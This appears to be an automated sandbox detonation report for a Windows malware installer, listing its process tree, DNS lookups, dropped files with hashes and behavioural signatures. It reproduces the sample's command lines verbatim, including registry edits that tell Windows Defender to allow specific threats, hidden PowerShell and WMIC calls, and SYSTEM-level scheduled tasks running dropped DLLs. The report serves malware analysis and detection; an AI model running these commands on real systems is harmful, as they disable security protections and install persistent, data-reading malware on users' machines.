C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe

C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe 4u /LOvzdidsh 525403 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bcicWGWSPuqTxjDSpV"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\prAQyJMeU\GRAMqk.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rbzCIowvsKWRrhO" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "rbzCIowvsKWRrhO2" /F /xml "C:\Program Files (x86)\prAQyJMeU\ENSCKpN.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "rbzCIowvsKWRrhO"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "rbzCIowvsKWRrhO"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yZMZGSbxnbvyuO" /F /xml "C:\Program Files (x86)\zNBDoCPwUgCU2\QySPxOf.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "IeZcDvoJstcUS2" /F /xml "C:\ProgramData\wpmocubwzvTKZWVB\usrkniE.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "XgRdArvYBmOriRaMM2" /F /xml "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\LuTejtX.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "pKGBoMxbXyYHoUCPnwv2" /F /xml "C:\Program Files (x86)\hkBthRLftwjEC\FBOYFfS.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "EXxaHtUqjXkXqVrbU" /SC once /ST 18:02:37 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HKomOEKiubDeyUja\aczHvjnJ\IapgGWT.dll\",#1 /WUUydidNui 525403" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "EXxaHtUqjXkXqVrbU"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HKomOEKiubDeyUja\aczHvjnJ\IapgGWT.dll",#1 /WUUydidNui 525403

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HKomOEKiubDeyUja\aczHvjnJ\IapgGWT.dll",#1 /WUUydidNui 525403

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 600

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "emrEEeoVdUigmulhl"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 696 -s 940

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "EXxaHtUqjXkXqVrbU"

Network

Country Destination Domain Proto
US 8.8.8.8:53 service-domain.xyz udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 api3.check-data.xyz udp

Files

\Users\Admin\AppData\Local\Temp\7zS18FD.tmp\Install.exe

MD5 4a90eddd33f120d1679ca04cf6a48891
SHA1 224f27d804bfc0a5d0948d0a928f0f92a1bbd7c8
SHA256 83f247c358d03498e9eea1783f89d3290cd686c9511bec56e906d9d0cc3740ca
SHA512 869b95497f751e097d5d75397677db7cd1b1795b15704084f4387154eebd19f68b23e8b6dd6e122ef57eecec33b2ce73547c3d243953eef7b3aacb39d9f7d187

\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe

MD5 f9a08c6959d27b9edcb157f1938ff8c9
SHA1 f57fc4c0780afc65f84b3f1fddd55bdd7519c3e2
SHA256 d052b74c87dd082fa1ccc32b8441e63e433a60c69b21174ccf43f7f134a725e0
SHA512 eabdfc83451aa2523b924f670a5026438dc69ae9c0687b8bf12c9e318e0bbab34862ebc7e39221f140af67cd9622e5e4f9c7881feb7376bb9c4fd31e3b62fe33

memory/2236-24-0x0000000010000000-0x00000000105E8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 6ae3e20c19795b7f6c1914c08bd08750
SHA1 ec36c6fdf3e445a8860ebb614934905df61ce3de
SHA256 90ec6f2b1e3f9e60063fe29a1d026faa3b1d9fd963d16c9cc2cbca18d9c0ed6f
SHA512 34d3607205df27f022d244ff99764c95bdd5b2d832e9203c0ad6c405739dd7b0ade010ab654b36583c82d2629e033b2c341ca449d5a1936cce6a960605b60537

memory/2976-36-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/3036-45-0x000000001B830000-0x000000001BB12000-memory.dmp

memory/3036-46-0x0000000001D80000-0x0000000001D88000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 a3c01beb1cda66f9e391d980cc51b08b
SHA1 491c37d49adb6b6131d7de49ca467d6c5574ae98
SHA256 e0e3790c60e02e2008cf31a0839d37127cc0f96dbe989547d4903e0a95a6791e
SHA512 d93424afb3a426535df6d90c35d2c1402cf891ef7fcbbc2f209080d0d10a797c1a399d065cbd71373243bf2f633498c54ce67f867e2dc141781ab1096ba21ae9

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1568-56-0x000000001B730000-0x000000001BA12000-memory.dmp

memory/1568-57-0x0000000001E60000-0x0000000001E68000-memory.dmp

C:\Windows\Temp\HKomOEKiubDeyUja\euJOQCWp\LeZBFQdWNANKeYuy.wsf

MD5 a367e680b7a985e45d326d2069358e87
SHA1 b30c666342bbc7e05753157bcce5e798cbfbc0fc
SHA256 37ffd58fe9d017d14bdc587c00b9c33b3626f276909ca7880ee043db8e1f7551
SHA512 1e260d27f8d3edcce24925dca502f5236fa1b8e4f7fd924141ac7b45b464a19cfb075937f7639b4b9bc9d68586996b6ccea7aeee3f35c81c6601fcaa1a5f9f81

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 e44af641abccaada31b7136e41840a79
SHA1 a39b595a5d9164a771270182a2318f4b835d1cc4
SHA256 6687a8e7966fb364fb2cde4743c0e7c4f3a0d1aba1fca326250040dadc3247e3
SHA512 7d7f466a9c539be2cfe87fb824811a6ef8c71d84796805232f16e5e3c5b99db9a15c43cb358f2a6450b9e71bae250d608e08cf10adbf1e155a2470695e72b71b

memory/2712-69-0x000000001B620000-0x000000001B902000-memory.dmp

memory/696-77-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/696-89-0x0000000001950000-0x00000000019D5000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

MD5 1b8d6253d0a881853b94f3943a52ecaf
SHA1 ab2d60dc17fa6b0f940f73c7c25e108b7f475ce3
SHA256 732007c068bc527762df52da5f54c6b0d7790d143e9828113ce594c1c09fe0ce
SHA512 4e9e56cf0dca29dab02b16afcb3f9557f1b46799657753033dd4027620553cee9f7e277e6258ef9300faa2e077b5f7d6df6994250bab68445eab3a4479d452e9

memory/696-122-0x0000000002290000-0x00000000022F3000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 648dada68b2859efecdd9f8bd1bf0258
SHA1 d28d2dcb53c982f897ea6bf872a503eec3709cad
SHA256 7e531a097cb2de609acfd2d47e3ef92a5e9e74f0129c4b3951e9909e3054d619
SHA512 6af5a1a6dc56ae6a872038989e2e356aa68b37bf5163e23d21bd80d07194a3cbc9d78d07e410d162e3aa06bd6eff48699570fd7de834ee20bb0b0ef82e35e0fa

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Program Files (x86)\prAQyJMeU\ENSCKpN.xml

MD5 db5d3d3f0a34ada5116cbdf9a868678d
SHA1 e69cbdd7398b3fe242342d6aeac3a007631f71e2
SHA256 4630febeafeb775e3f37da28bacfaf7b535292cce63597f9eccea2df8fb0395a
SHA512 35412fefaae5416c2f172b39f07a4bd54dafd4967a90d5c719e4e50756c01d91d086dbc138958b47f3d0301b5526243e53a217aef81c23a031cf36916c5f9a66

C:\Program Files (x86)\zNBDoCPwUgCU2\QySPxOf.xml

MD5 ef05f3380bc052e801b9e23a1d43476b
SHA1 87c139b03883aefe1c54379bcb73e2ba4d231a09
SHA256 6c41006342b21a875dd323b348e5b5bb7a2061effa6618e77f9e8c3140424edc
SHA512 bf649e42fb77f8395f38a425262d3545f0b0d9d0fec79208c58954d7686462dedd4b359333a88bfda8995b9c555d9e7375022f0bfa2b13227df882b44f452a56

C:\ProgramData\wpmocubwzvTKZWVB\usrkniE.xml

MD5 de8fbac46db80ea58e4a607a6980c25c
SHA1 ab1ecba4d41b1044ea6737fbcf11b70e76f2e215
SHA256 24f17ebac4b4625bf48381772a579f3eee52f2459817fa425a391f55757900ff
SHA512 a335c16b64139c3399b2bedfb45b8aaa7e7a1e63f8eeaaa1769b3544c93c020f1cf18eb621e95ef22ab2ac9ddbc07359e145f0a9ad516ff27b3ba20ac9a3cb1e

C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\LuTejtX.xml

MD5 fdd848b9d56e33b2feb6708a979041b2
SHA1 6810bd659585334a17af480145301feb41028956
SHA256 6a7fd1aab7e4f88c01de9489b5eb8c41949c51abe0331ddd75a1a91582959735
SHA512 3ba24b7e9ec21b5248adcfe27cb72671726333f336fc3a1c451c03da9df4981a85d176d7b92cb71d5223d8ea61404ed1ecb4efff4c7e8f68cf15b9e6ffa99431

C:\Program Files (x86)\hkBthRLftwjEC\FBOYFfS.xml

MD5 7a84526f91031b5318c22fe35c7b0b01
SHA1 49f556948fa2ad2c765aeaf7530f8937b1a1e0f4
SHA256 1d8baaeb3bfaab1a162cf8332199cad625060bbf98e0609f74950da94fa159c8
SHA512 7d66f9e6ad62b963d4231d4cd02030d6628b3e0b20c19ce5f913848a6381492cbaef7c3768a5a57ae15f0775aad8b085a81b350384b9013a2c7840c9a3d0eb97

C:\Windows\Temp\HKomOEKiubDeyUja\aczHvjnJ\IapgGWT.dll

MD5 216eb0d2159277ee754d47ff6f6ac846
SHA1 acd01636db032de730b96f3d97262989f530da36
SHA256 d488c456e9a11710894221582b8664e12fd716e621c12bc5247dba70459c7f95
SHA512 16d34eb7bb2c1a0ee2f949cd7615dc53e59b28b1380f4b0ebbc3a6ce31804a4defeb6c00715eac93d2b733411b15f1c970aa6777753ebe488f75840765ca551d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ox017b3g.default-release\prefs.js

MD5 01b1776a35ca2e585d46e0b0714aa8db
SHA1 4d5f0ea3a8fa911edc6791b1b7f80a700df705f4
SHA256 700fd9a6b06b1605fe20a3beb79d269e7ce18245c1733838644768274104dd82
SHA512 8f7bda5b3aadb7832a00cba90f137c8989f422ba0b51c21b1b30d2da8c65cfeb4f48c962ed378e9ceee5c48084059b73f7e207495c53dbfb83bc98e156ef42eb

memory/696-279-0x0000000002650000-0x00000000026D1000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 751fe17f316ca4c7bce55e9ecbbd4da8
SHA1 b6a2e192677fdd36d891e5f94080fdf6f58bb4e3
SHA256 8d2416c9640f1eb6c2266059ca9212a0437b5ae54c988a730c598172a1683824
SHA512 a3668e8627316789bf745acee6d4380eb8f4387f77c951df37d5c21e51636c9923cc51f9d2e0b30a888224d7ac788f7ed3f1a4df374280600ec7d1026d6a85f1

memory/696-289-0x0000000002DF0000-0x0000000002ED2000-memory.dmp

memory/1876-320-0x0000000001330000-0x0000000001918000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 23:32

Reported

2024-06-13 23:37

Platform

win10-20240404-en

Max time kernel

162s

Max time network

298s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8cc0583dfa0b39385cd6c082c2debc2ea743dee8a5240d9edfb805dc2fe8c0d5.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8C71.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
